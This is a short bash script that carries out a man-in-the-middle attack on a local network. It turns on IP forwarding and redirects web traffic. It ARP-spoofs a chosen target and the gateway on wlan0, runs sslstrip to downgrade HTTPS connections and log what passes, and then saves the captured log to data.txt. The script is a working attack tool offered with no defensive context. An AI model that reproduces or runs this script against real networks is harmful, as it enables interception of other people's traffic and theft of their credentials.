#!/bin/bash

target=$1
gateway="$(ip route show | cut -z -d " " -f 3)"

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

timeout 50s xterm -e arpspoof -i wlan0 -t $target -r $gateway &

iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT

timeout 50s xterm -e sslstrip -w scripts/sslstrip.log -l 8080 &

sleep 50s

cat scripts/sslstrip.log > scripts/data.txt
